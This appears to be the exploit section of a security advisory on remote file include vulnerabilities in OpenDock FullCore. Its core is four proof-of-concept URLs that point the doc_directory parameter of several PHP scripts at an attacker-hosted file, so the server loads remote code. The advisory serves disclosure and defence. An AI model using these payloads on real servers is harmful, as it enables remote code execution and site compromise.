• info
• discussion
• exploit
• solution
• references

OpenDock FullCore Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept exploits are available:

http://example.com/[OpenDockFullCore_Path]/sw/index_sw.php?doc_directory=http://example.com/attacker_file

http://example.com/[OpenDockFullCore_Path]/sw/lib_cart/cart.php?doc_directory=http://example.com/attacker_file

http://example.com/[OpenDockFullCore_Path]/sw/lib_cart/lib_cart.php?doc_directory=http://example.com/attacker_file

http://example.com/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=http://example.com/attacker_file